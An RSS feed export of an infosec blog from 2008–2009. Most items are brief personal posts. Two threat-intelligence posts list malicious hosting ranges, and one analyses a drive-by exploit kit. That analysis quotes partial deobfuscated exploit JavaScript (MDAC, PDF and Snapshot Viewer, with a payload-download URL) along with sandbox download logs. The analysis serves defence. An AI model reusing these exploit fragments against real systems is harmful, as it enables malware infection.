<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Real Security</title>
	<atom:link href="http://realsecurity.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://realsecurity.wordpress.com</link>
	<description>Exploring all things infosec</description>
	<lastBuildDate>Thu, 16 Apr 2009 19:53:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='realsecurity.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Real Security</title>
		<link>http://realsecurity.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://realsecurity.wordpress.com/osd.xml" title="Real Security" />
	<atom:link rel='hub' href='http://realsecurity.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Moving Hosts</title>
		<link>http://realsecurity.wordpress.com/2009/04/16/moving-hosts/</link>
		<comments>http://realsecurity.wordpress.com/2009/04/16/moving-hosts/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 19:53:54 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/2009/04/16/moving-hosts/</guid>
		<description><![CDATA[I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=204&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I’ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition to <a title="Martin Security" href="http://www.martinsecurity.net" target="_blank">http://www.martinsecurity.net</a> .  Stay tuned.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/204/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/204/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/204/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=204&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2009/04/16/moving-hosts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Social Security Awards</title>
		<link>http://realsecurity.wordpress.com/2009/03/14/social-security-awards/</link>
		<comments>http://realsecurity.wordpress.com/2009/03/14/social-security-awards/#comments</comments>
		<pubDate>Sat, 14 Mar 2009 11:43:12 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=202</guid>
		<description><![CDATA[Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area. Vote here:  http://www.socialsecurityawards.com/ I shall resume regular [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=202&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area.</p>
<p>Vote here: <a title="SocialSecurityAwards" href="http://www.socialsecurityawards.com/" target="_blank"> http://www.socialsecurityawards.com/</a></p>
<p>I shall resume regular updates in May upon my return!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/202/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/202/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/202/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=202&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2009/03/14/social-security-awards/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Mobile Device Forensics</title>
		<link>http://realsecurity.wordpress.com/2009/01/29/mobile-device-forensics/</link>
		<comments>http://realsecurity.wordpress.com/2009/01/29/mobile-device-forensics/#comments</comments>
		<pubDate>Thu, 29 Jan 2009 17:43:43 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Forensics]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=198</guid>
		<description><![CDATA[While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barak Obama is going to be the first president to use a blackberry. Article http://blog.wired.com/business/2009/01/obama-gets-to-k.html With there being some buzz around blackberry security, it&#8217;s a good time to mention the paper I [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=198&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barak Obama is going to be the first president to use a blackberry.</p>
<p>Article <a title="http://blog.wired.com/business/2009/01/obama-gets-to-k.html" href="http://blog.wired.com/business/2009/01/obama-gets-to-k.html" target="_blank">http://blog.wired.com/business/2009/01/obama-gets-to-k.html</a></p>
<p>With there being some buzz around blackberry security, it&#8217;s a good time to mention the paper I wrote for SANS on mobile device forensics.</p>
<p>It can be found at: <a href="http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888?show=32888.php&amp;cat=forensics" target="_blank">http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888?show=32888.php&amp;cat=forensics</a></p>
<p>The paper covers how to investigate a cellular phone (Motorola Razr), smartphone (blackberry) and MP3 player to gather information, recover deleted data, etc.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/198/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=198&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2009/01/29/mobile-device-forensics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Taking some time off</title>
		<link>http://realsecurity.wordpress.com/2009/01/07/taking-some-time-off/</link>
		<comments>http://realsecurity.wordpress.com/2009/01/07/taking-some-time-off/#comments</comments>
		<pubDate>Wed, 07 Jan 2009 20:05:47 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=196</guid>
		<description><![CDATA[Since we normally only live once, I&#8217;ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I&#8217;ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America. Maybe I&#8217;ll post some photos [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=196&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Since we normally only live once, I&#8217;ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I&#8217;ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.</p>
<p>Maybe I&#8217;ll post some photos along the way to make all my readers jealous <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Happy hunting,</p>
<p>RealSecurity</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/196/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/196/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/196/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=196&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2009/01/07/taking-some-time-off/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; Still Trade LTD</title>
		<link>http://realsecurity.wordpress.com/2008/12/22/sources-of-badness-still-trade/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/22/sources-of-badness-still-trade/#comments</comments>
		<pubDate>Mon, 22 Dec 2008 18:39:13 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=191</guid>
		<description><![CDATA[The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here. person: Perevitskiy [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=191&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL66769" target="_blank">here</a>.</p>
<p>person:         Perevitskiy Sergey<br />
address:        Russian Federation,<br />
address:        St. Petersburg, Fedosenko st, 30 liter A, 24-N<br />
mnt-by:         STILLTRADE-MNT<br />
abuse-mailbox:  abuse@still-trade.com<br />
e-mail:         perevitzky.sergey@still-trade.com<br />
phone:          +7 (960) 257-87-90<br />
nic-hdl:        PERE1-RIPE<br />
changed:        lexa@wahome.ru 20080624<br />
source:         RIPE</p>
<p>Still Trade hosts a ton of fake/rogue anti virus domains and applications. We&#8217;ve seen these hosts pop up recently:</p>
<p><strong>91.208.0.220</strong><br />
2008-12-01<br />
scanner.rapidantivirus.com	/setup/setup.exe &#8211; Fake AV</p>
<p><a href="http://www.virustotal.com/analisis/ddaaa11019e101b0cec97868feb4f63a" target="_blank">Trojan:Win32/FakePowav<br />
FraudTool.Win32.ExtraAntivir.c<br />
Win32/FakeAV!generic</a></p>
<p><strong>91.208.0.221</strong><br />
2008-12-11<br />
myprivatetubes09.net	/cd/650/1749/wmpcdcs.exe &#8211; Zlob</p>
<p><a href="http://www.virustotal.com/analisis/70a709dd1196f15b3d6db1a6edd1c2c8" target="_blank">DR/Zlob.Gen<br />
TrojanDownloader:Win32/Renos.HB<br />
Mal/Emogen-G<br />
</a></p>
<p><strong>91.208.0.253</strong><br />
2008-12-03<br />
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe &#8211; Zlob</p>
<p>Same as above</p>
<p>The following IPs are associated with malicious applications:</p>
<p>91.208.0.220<br />
91.208.0.221<br />
91.208.0.223<br />
91.208.0.224<br />
91.208.0.225<br />
91.208.0.228<br />
91.208.0.229<br />
91.208.0.230<br />
91.208.0.231<br />
91.208.0.234<br />
91.208.0.235<br />
91.208.0.236<br />
91.208.0.237<br />
91.208.0.238<br />
91.208.0.239<br />
91.208.0.240<br />
91.208.0.241<br />
91.208.0.242<br />
91.208.0.243<br />
91.208.0.244<br />
91.208.0.245<br />
91.208.0.246<br />
91.208.0.247<br />
91.208.0.248<br />
91.208.0.249<br />
91.208.0.250<br />
91.208.0.251<br />
91.208.0.252<br />
91.208.0.253<br />
91.208.0.254</p>
<p>BISS also has a <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&amp;st=90&amp;p=88153&amp;#entry88153" target="_blank">comprehensive list of domains and malware</a> being served by these guys.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/realsecurity.wordpress.com/191/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/realsecurity.wordpress.com/191/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/realsecurity.wordpress.com/191/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=191&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://realsecurity.wordpress.com/2008/12/22/sources-of-badness-still-trade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8fc402b4fc8c2b2b477a0e5a5013fa0f?s=96&#38;d=identicon" medium="image">
			<media:title type="html">realsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Sources of Badness &#8211; Starline Web Services</title>
		<link>http://realsecurity.wordpress.com/2008/12/17/sources-of-badness-starline-web-services/</link>
		<comments>http://realsecurity.wordpress.com/2008/12/17/sources-of-badness-starline-web-services/#comments</comments>
		<pubDate>Wed, 17 Dec 2008 21:50:56 +0000</pubDate>
		<dc:creator>realsecurity</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=177</guid>
		<description><![CDATA[Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&#38;C as reported by Fireeye. inetnum: 92.62.101.0 - 92.62.101.255 netname: STARLINE_EE descr: Starline Web Services country: EE admin-c: VN268-RIPE tech-c: VN268-RIPE status: ASSIGNED PA mnt-by: AS39823-MNT changed: roman@compic.ee 20080403 e-mail: info@starline.ee abuse-mailbox: abuse@starline.ee source: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=realsecurity.wordpress.com&amp;blog=4565816&amp;post=177&amp;subd=realsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for <a href="http://tech.yahoo.com/news/pcworld/20081127/tc_pcworld/estonianispcutsoffcontrolserversforsrizbibotnet" target="_blank">briefly hosting a Srizbi C&amp;C</a> as reported by <a href="http://blog.fireeye.com/research/2008/11/pushdocutwail-control-servers.html" target="_blank">Fireeye.</a></p>
<pre>inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE</pre>
<p>The Yahoo article has lots of great information on the relationship between Starline and it&#8217;s upstream providers, so I won&#8217;t delve into that here.</p>
<p>Here are the hits I&#8217;ve seen from their IP space:</p>
<p>92.62.100.0 &#8211; 92.62.101.255</p>
<p><strong>92.62.100.68</strong><br />
2008-11-05<br />
plotfive.cn	/load.php</p>
<p>2008-11-12	 	/cache/doc.pdf</p>
<p>2008-11-22		/cache/doc.pdf</p>
<p><strong>92.62.101.13 </strong><br />
2008-10-24<br />
tgspk.cn	/zpl/pdf.php</p>
<p><strong>92.62.101.53</strong><br />
2008-10-30<br />
blufda.com	/eez3a893/spl/pdf.pdf</p>
<p>2008-11-26 		/u8899r5v/spl/pdf.pdf<br />
/u8899r5v/exe.php</p>
<p>2008-12-17<br />
kraspa.com	/yg6cv7ar/spl/pdf.pdf</p>
<p><strong>92.62.100.44</strong><br />
2008-09-18<br />
92.62.100.44	/1/<br />
/2/<br />
<strong>92.62.100.43</strong><br />
2008-09-17<br />
92.62.100.43	/1/<br />
/2/</p>
<p>There&#8217;s quite a history here. From the looks of things, someone has been<br />
moving around their malware from domain to domain on 92.62.101.53. All<br />
of these sites are down as of this writing except kraspa.com. Lets dive<br />
further into this site.</p>
<p>The first page I saw was kraspa.com	/yg6cv7ar/spl/pdf.pdf however<br />
this is not the whole story. When investigating that exact URL, pdf.pdf<br />
is not found. This is curious as I saw the site earlier today. Backing up<br />
to the root of kraspa.com, we get an index page. The index page contains<br />
an iframe that points to a different directory. The malware author must<br />
have coded his site to rotate directory names based on a certain criteria.<br />
This makes investigation difficult if you can&#8217;t figure out where it will<br />
send victims to next.</p>
<p>The next iframe I got contained:</p>
<p>src=&#8221;/ov9632l9/index.php&#8221;</p>
<p>The next page that comes into play is the exploit script index.php which<br />
is detected as:</p>
<p><a href="http://www.virustotal.com/analisis/faab63a5b6f386690821ea5304aa36ab" target="_blank">Trojan-Downloader.JS.Psyme.alv</a></p>
<p>Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and<br />
the Microsoft Access Snapshot viewer. Here&#8217;s some of the script:</p>
<p><em> var p_url = &#8220;http://kraspa.com/ov9632l9/ztt.php&#8221;;<br />
function MDAC(){<br />
</em></p>
<p><em> var nuc=&#8221;;<br />
d8= 0;<br />
var koSZV = document.createElement(&#8220;o&#8221;+nuc+&#8221;b&#8221;+nuc+&#8221;je&#8221;+nuc+&#8221;c&#8221;+nuc+&#8221;t&#8221;);<br />
koSZV.setAttribute(&#8220;id&#8221;,&#8221;&lt;&#8221;+nuc+&#8221;?=k&#8221;+nuc+&#8221;o&#8221;+nuc+&#8221;S&#8221;+nuc+&#8221;ZV?&#8221;+nuc+&#8221;&gt;&#8221;);<br />
[....]<br />
function PDF()<br />
{<br />
document.write(&#8216;&lt;iframe src=&#8221;spl/pdf.pdf&#8221; width=1 height=1 style=&#8221;display:none&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
[....]<br />
function SS()<br />
{<br />
var arbitrary_file = p_url;<br />
var dest = &#8216;C:/AUTOEXEC.BAT&#8217;;<br />
document.write(&#8220;&lt;object classid=&#8217;clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9&#8242; id=&#8217;attack&#8217;&gt;&lt;/object&gt;&#8221;);<br />
[....]<br />
if (MDAC()||PDF()||SS()) { }</em><br />
Detections for the malicious pdf:</p>
<p><a href="http://www.virustotal.com/analisis/1515251991187a70685a8ffd1f118cfb" target="_blank">JS:Agent-BQ<br />
Exploit.RealPlr.K</a></p>
<p>The payload is a file called ztt.php, here are a few of the detections:</p>
<p><a href="http://www.virustotal.com/analisis/49fcad6c673077efcd345f12f03424ff" target="_blank">Trojan.Win32.Delf.gpg<br />
Troj/Dloadr-BZT<br />
Trojan.Win32.Delf.fyl</a></p>
<p>A quick submission to Threat Expert (<a href="http://www.threatexpert.com/report.aspx?md5=0faec8b68a1840a3221fecc04f919a7c" target="_blank">report</a>) and Anubis (<a href="http://anubis.iseclab.org/?action=result&amp;task_id=1d7454d6dc3c49254352eaeacc44a4465&amp;format=html" target="_blank">report</a>) reveal<br />
further binaries that are downloaded. The .dat files are not exes, but a<br />
type of binary data file.</p>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1033                                     to 92.62.101.53:80 &#8211; [kraspa.com] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/zro.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/mp.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/3rkour.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Of particular interest is 79.143.177.43, another Latvian host with a<br />
small /24 network. Might be worth keeping your eyes open for them too.</p>
<pre>inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT</pre>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1036                                     to 79.143.177.43:80 &#8211; [79.143.177.43] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /myfiles/95/139/file.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell" colspan="2"><strong> From ANUBIS:1037                                     to 210.83.85.100:80 &#8211; [orzsys.cc] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /files/20026.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Some detections for 20026.exe, and file.exe:</p>
<p><a href="http://www.virustotal.com/analisis/66971c2f64d6162f8270fba7635e7906" target="_blank">BDS/Hupigon.Gen<br />
Trojan.FakeAlert.Gen!Pac.2</a> </p>
<p><a href="http://www.virustotal.com/analisis/07453d142befa44fcbb1fabaaf127a46" target="_blank">Trojan.Crypt.LooksLike.XPACK<br />
Trojan.FakeAlert.Gen!Pac.2</a></p>
<p>The FakeAlert signatures are correct, the threat ultimatly installs some<br />
fake anti virus / anti spyware application.</p>
<p><a href="http://realsecurity.files.wordpress.com/2008/12/spyware-big.jpg" target="_blank"><img class="alignnone size-full wp-image-180" title="small" src="http://realsecurity.files.wordpress.com/2008/12/small.jpg?w=443&#038;h=354" alt="small" width="443" height="354" /></a></pre>
